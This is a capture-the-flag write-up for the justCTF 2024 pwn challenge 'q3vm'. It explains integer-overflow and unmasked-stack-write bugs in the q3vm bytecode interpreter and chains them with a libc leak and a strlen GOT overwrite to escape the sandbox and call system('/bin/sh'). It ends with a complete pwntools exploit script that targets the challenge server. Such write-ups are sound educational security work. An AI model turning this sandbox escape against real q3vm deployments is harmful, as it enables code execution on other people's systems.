Contents

justCTF 2024

Writeup of pwn/q3vm from justCTF 2024 teaser.

overview

Description

You want to play Quake 3 with friends. Prepare a nice game plugin!

Author: Rivit

This challenge was based off of the latest commit of q3vm, a bytecode virtual machine related to an implementation from the Quake III Arena video game. It advertises itself as a “sandbox for code you don’t fully trust,” but numerous vulnerabilities can be found that we’ll use to escape the VM and spawn a shell. The challenge’s server simply asks for a qvm bytecode file limited to 0x8000 bytes and runs it directly.

design

All logic for the interpreter is stored in the single source file vm.c. Bytecode files start with a header laying out different segments, the structure of which is shown below.

typedef struct
{
    int32_t vmMagic;          /**< Bytecode image shall start with VM_MAGIC */
    int32_t instructionCount; /**< Number of instructions in .qvm */
    int32_t codeOffset;       /**< Byte offset in .qvm file of .code segment */
    int32_t codeLength;       /**< Bytes in code segment */
    int32_t dataOffset;       /**< Byte offset in .qvm file of .data segment */
    int32_t dataLength;       /**< Bytes in .data segment */
    int32_t litLength;        /**< Bytes in strings segment (after .data segment) */
    int32_t bssLength;        /**< How many bytes should be used for .bss segment */
} vmHeader_t;

The VM_Create function and the VM_LoadQVM helper function are responsible for loading the bytecode file into memory and verifying its structure. This is where we encounter the first (albeit unhelpful) bug. The data, literal, and bss sections are combined into one memory segment that we’ll simply call data. Its length is calculated as follows.

    /* round up to next power of 2 so all data operations can
       be mask protected */
    dataLength =
        header.h->dataLength + header.h->litLength + header.h->bssLength;
    for (i = 0; dataLength > (1 << i); i++)
    {
    }
    dataLength = 1 << i;

There is an integer overflow when first assigning to dataLength, because the preceding validation (shown below) allows header.h->litLength and header.h->dataLength to be any positive 32 bit signed integer.

        /* validate */
        if (header.h->bssLength < 0 || header.h->dataLength < 0 ||
            header.h->litLength < 0 || header.h->codeLength <= 0 ||
            header.h->codeOffset < 0 || header.h->dataOffset < 0 ||
            header.h->instructionCount <= 0 ||
            header.h->bssLength > VM_MAX_BSS_LENGTH ||
            header.h->codeOffset + header.h->codeLength > length ||
            header.h->dataOffset + header.h->dataLength + header.h->litLength >
                length)
        {
            Com_Printf("Warning: %s has bad header\n", vm->name);
            return NULL
        }

I didn’t end up utilizing this bug, but what’s important to note here is how dataLength is a power of 2. The VM tries to implement a sandbox by bitwise ANDing all indeces into data with dataMask, which is dataLength-1. I presume this masking feature is why the VM only includes bounds checks in the debug build. The data segment is then allocated as follows.

    /* allocate zero filled space for initialized and uninitialized data
     leave some space beyond data mask so we can secure all mask operations */
    vm->dataAlloc = dataLength + 4;
    vm->dataBase  = (uint8_t*)Com_malloc(vm->dataAlloc, vm, VM_ALLOC_DATA_SEC);
    vm->dataMask  = dataLength - 1;

Notice that vm->dataBase is allocated from a single malloc call. This is the only heap control we get. Our bytecode file is limited to 0x8000 bytes, but the bss section doesn’t expect any backing bytes in the file, so due to the VM_MAX_BSS_LENGTH limit of 0xa00000, we can control malloc with sizes up to 2^24. The VM structure itself is stored on the stack in the main function. I’ll include its full declaration below, as it explains each component in detail.

/** Main struct (think of a kind of a main class) to keep all information of
 * the virtual machine together. Has pointer to the bytecode, the stack and
 * everything. Call VM_Create(...) to initialize this struct. Call VM_Free(...)
 * to cleanup this struct and free the memory. */
typedef struct vm_s
{
    /* DO NOT MOVE OR CHANGE THESE WITHOUT CHANGING THE VM_OFFSET_* DEFINES
       USED BY THE ASM CODE (IF WE ADD THE Q3 JIT COMPILER IN THE FUTURE) */

    int programStack; /**< Stack pointer into .data segment. */

    /** Function pointer to callback function for native functions called by
     * the bytecode. The function is identified by an integer id that
     * corresponds to the bytecode function ids defined in g_syscalls.asm.
     * Note however that parms equals to (-1 - function_id).
     * So -1 in g_syscalls.asm equals to 0 in the systemCall parms argument,
     *    -2 in g_syscalls.asm equals to 1 in the systemCall parms argument,
     *    -3 in g_syscalls.asm equals to 2 in the systemCall parms argument
     * and so on. You can convert it back to -1, -2, -3, but the 0 based
     * index might help a lookup table. */
    intptr_t (*systemCall)(struct vm_s* vm, intptr_t* parms);

    /*------------------------------------*/

    char  name[VM_MAX_QPATH]; /** File name of the bytecode */
    void* searchPath;         /**< unused */

    /* for dynamic libs (unused in Q3VM) */
    void* unused_dllHandle;                          /**< unused */
    intptr_t (*unused_entryPoint)(int callNum, ...); /**< unused */
    void (*unused_destroy)(struct vm_s* self);       /**< unused */

    int currentlyInterpreting; /**< Is the vm currently running? */

    int      compiled;   /**< Is a JIT active? Otherwise interpreted */
    uint8_t* codeBase;   /**< Bytecode code segment */
    int      entryOfs;   /**< unused */
    int      codeLength; /**< Number of bytes in code segment */

    intptr_t* instructionPointers;
    int       instructionCount; /**< Number of instructions for VM */

    uint8_t* dataBase;  /**< Start of .data memory segment */
    int      dataMask;  /**< VM mask to protect access to dataBase */
    int      dataAlloc; /**< Number of bytes allocated for dataBase */

    int stackBottom; /**< If programStack < stackBottom, error */

    /*------------------------------------*/

    /* DEBUG_VM */
    int         numSymbols; /**< Number of symbols from VM_LoadSymbols */
    vmSymbol_t* symbols;    /**< By VM_LoadSymbols: names for debugging */

    int callLevel;     /**< Counts recursive VM_Call */
    int breakFunction; /**< For debugging: break at this function */
    int breakCount;    /**< Used for breakpoints, triggered by OP_BREAK */

    /* non vanilla q3 area: */
    vmErrorCode_t lastError; /**< Last known error */
} vm_t;

The most important member of the vm struct to our exploitation is programStack. It’s an index starting at the end of dataBase used to emulate a call stack. There are no bounds checks on it, and the OP_ENTER instruction allows us to arbitrarily over/underflow it, but as mentioned earlier, this is mitigated by the fact that it’s masked whenever used as an index.

After VM_Create, interpretation is initiated from main with the VM_Call function, which sets up some arguments and calls VM_CallInterpreted. Each instance of VM_CallInterpreted is used to execute one function, which has its own operand stack, opStack, that most instructions will pull their arguments from. The instructions within the function are executed sequentially until an OP_LEAVE with a negative destination is encountered.

exploitation

We’ll first need a vulnerability that allows us to to leak addresses. Note that all instructions deal with 32 bits, and the target of our write later on will only require us to modify the lower 32 bits of an address, so the goal is to get the lower 32 bits of some libc address in our operand stack. We can then perform calculations to adjust it to any libc address, like system. The opStack of a function is not zeroed upon entry, and there are OP_PUSH and OP_POP instructions that let us adjust opStackOfs, the index of the top of the operand stack, without modifying any of the data. This lets us use leftover addresses on the stack.

        /* push and pop are only needed for discarded or bad function return
           values */
        goto_OP_PUSH:
            opStackOfs++;
            DISPATCH();
        goto_OP_POP:
            opStackOfs--;
            DISPATCH();

Running in the nsjail Docker with gdb, I was able to find a reliable libc address in the operand stack, but I will note that the leaks I found when testing in the base Ubuntu Docker without nsjail did not end up working in nsjail locally or on remote.

The next vulnerability provides us “arbitrary” heap-relative write. As mentioned earlier, we can overflow programStack with OP_ENTER.

    goto_OP_ENTER:
        /* get size of stack frame */
        v1 = r2;

        programCounter += 1;
        programStack -= v1;

r2 is a signed 32 bit integer we control, so we can make it negative to overflow programStack. There are no other effects of this instruction. But surely programStack is properly masked whenever it’s used as an index, right?

    goto_OP_CALL:
        /* save current program counter */
        *(int*)&image[programStack] = programCounter;

        /* jump to the location on the stack */
        programCounter = r0;
        opStackOfs--;

Well, not in OP_CALL. Note that the value we write is not exactly arbitrary, since it has to be a valid programCounter. And with our file size limited to 0x8000 bytes, that’s not a wide range. Also note that image is the same as vm->dataBase.

We can circumvent this value restriction with the feature of “system calls”. While I’m unsure if the author intended this, these system calls will live true to their name and let us call system with arbitrary arguments. The next part of OP_CALL is as follows.

    if (programCounter < 0) /* system call */
        {
            int r;
            /* save the stack to allow recursive VM entry */
            vm->programStack = programStack - 4;
            *(int*)&image[programStack + 4] = -1 - programCounter;

            /* the vm has ints on the stack, we expect
               pointers so we might have to convert it */
            if (sizeof(intptr_t) != sizeof(int))
            {
                intptr_t argarr[MAX_VMSYSCALL_ARGS];
                int*     imagePtr = (int*)&image[programStack];
                int      i;
                for (i = 0; i < (int)ARRAY_LEN(argarr); ++i)
                {
                    argarr[i] = *(++imagePtr);
                }
                r = vm->systemCall(vm, argarr);
            }

In the main program file, the functions memset, printf, and memcpy are exposed as functions that operate on VM arguments. The arguments are treated as indeces into vm->dataBase, and the pointer conversion is done securely.

void* VM_ArgPtr(intptr_t vmAddr, vm_t* vm)
{
    if (!vmAddr)
    {
        return NULL;
    }
    if (vm == NULL)
    {
        Com_Error(VM_INVALID_POINTER, "Invalid VM pointer");
        return NULL;
    }
    return (void*)(vm->dataBase + (vmAddr & vm->dataMask));
}

The OP_CALL instruction identifies these system calls as having negative programCounters. The systemCalls function switches on the programCounter to the predefined functions, but for the default case, it will just print an error and return as usual.

    default:
        fprintf(stderr, "Bad system call: %i\n", id);
    }

Notice how with the first image[programStack] = programCounter, programCounter will reference the current instruction and thus must be in the 0x8000 range. When the destination programCounter gets assigned after that, however, r0 is an opStack argument we control. If we choose to make it negative and enter a system call, it will also write without masking programStack, and any negative programCounter is viable here. This means we can write any 32 bit value, so long as its sign bit isn’t set (because programCounter is negated in the calculation). For a libc address, that bit will be determined by ASLR, so we have a 1 bit bruteforce.

    *(int*)&image[programStack + 4] = -1 - programCounter;

Recall that this write is relative to vm->dataBase, and vm->dataBase is the result of a malloc call with a size we partially control. This would normally provide us with arbitrary heap write, but that’s useless here since we don’t have heap control afterwards. Past a certain chunk size, malloc will mmap chunks directly instead of taking them from the heap. Due to mmap relativity, these chunks will be at a consistent offset from libc. TLS offset can make this not consistent, but when running in Docker, we’ll see our large chunks get mapped directly above libc.

We can now overflow programStack to point it into the libc read-write region, and using our leaks, overwrite the low 32 bits of some sensitive address. Luckily, this libc is partial RELRO, meaning it has writeable function pointers in its GOT. Due to the use of printf as a “system call” with arguments we control, we can overwrite the GOT of the optimized strlen function used by printf to hijack control flow with an argument. We overwrite the GOT to system and make the “system call” with a valid data index corresponding to /bin/sh in the data section. This will spawn us a shell.

A snippet of the main instructions in my solution as well as the full solve script are provided below.

    # offset into strlen got
    pl = insn(OP_ENTER, 0xffdfdf58)
    # adjust top of stack to leftover libc address
    for _ in range(6):
        pl += insn(OP_PUSH)
    # calculate offset to system and negate
    pl += insn(OP_CONST, 0x1c3fe1)
    pl += insn(OP_SUB)
    pl += insn(OP_NEGI)
    # bad system call to write system to strlen
    pl += insn(OP_CALL)
    pl += insn(OP_ENTER, 0x22206c)
    # real printf system call with /bin/sh argument
    pl += insn(OP_CONST, 0xffffffff)
    pl += insn(OP_CALL)
#!/usr/bin/env python3

from pwn import *

exe = ELF("./q3vm_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

serv = "q3vm.nc.jctf.pro"
port = 1337

context.binary = exe

def conn(pl):
    if args.REMOTE:
        r = remote(serv, port)
        r.sendlineafter(b":", str(len(pl)).encode())
        r.sendafter(b":", pl)
    else:
        r = process("runner")
        r.sendlineafter(b":", str(len(pl)).encode())
        r.sendafter(b":", pl)
    return r

opcodes = [
    "OP_UNDEF",  "OP_IGNORE", "OP_BREAK",  "OP_ENTER", "OP_LEAVE",
    "OP_CALL",   "OP_PUSH",   "OP_POP",    "OP_CONST", "OP_LOCAL",
    "OP_JUMP",   "OP_EQ",     "OP_NE",     "OP_LTI",   "OP_LEI",
    "OP_GTI",    "OP_GEI",    "OP_LTU",    "OP_LEU",   "OP_GTU",
    "OP_GEU",    "OP_EQF",    "OP_NEF",    "OP_LTF",   "OP_LEF",
    "OP_GTF",    "OP_GEF",    "OP_LOAD1",  "OP_LOAD2", "OP_LOAD4",
    "OP_STORE1", "OP_STORE2", "OP_STORE4", "OP_ARG",   "OP_BLOCK_COPY",
    "OP_SEX8",   "OP_SEX16",  "OP_NEGI",   "OP_ADD",   "OP_SUB",
    "OP_DIVI",   "OP_DIVU",   "OP_MODI",   "OP_MODU",  "OP_MULI",
    "OP_MULU",   "OP_BAND",   "OP_BOR",    "OP_BXOR",  "OP_BCOM",
    "OP_LSH",    "OP_RSHI",   "OP_RSHU",   "OP_NEGF",  "OP_ADDF",
    "OP_SUBF",   "OP_DIVF",   "OP_MULF",   "OP_CVIF",  "OP_CVFI",
    "OP_UNDEF",  "OP_UNDEF",  "OP_UNDEF",  "OP_UNDEF",
]
globals().update({op: i for i, op in enumerate(opcodes)})

ninsn = 0

def prog(pl):
    h = p32(0x12721444)
    h += p32(ninsn)
    h += p32(32)
    h += p32(len(pl))
    h += p32(32+len(pl))
    h += p32(8-len(pl)%8 + 0x1000)
    h += p32(0)
    h += p32(0x15000)
    return h + pl + p32(0x30)*8 + b"/bin/sh\x00"*(0x1000//8-4) + b"A"*(8-len(pl)%8)

def insn(op, arg=None):
    global ninsn
    ninsn += 1
    pl = p8(op)
    if arg:
        if op == OP_ARG:
            pl += p8(arg)
        else:
            pl += p32(arg)
    return pl

def main():
    # offset into strlen got
    pl = insn(OP_ENTER, 0xffdfdf58)
    # adjust top of stack to leftover libc address
    for _ in range(6):
        pl += insn(OP_PUSH)
    # calculate offset to system and negate
    pl += insn(OP_CONST, 0x1c3fe1)
    pl += insn(OP_SUB)
    pl += insn(OP_NEGI)
    # bad system call to write value to strlen
    pl += insn(OP_CALL)
    pl += insn(OP_ENTER, 0x22206c)
    # real printf syscall with /bin/sh argument
    pl += insn(OP_CONST, 0xffffffff)
    pl += insn(OP_CALL)
    pl = prog(pl)
    r = conn(pl)
    r.interactive()

if __name__ == "__main__":
    main()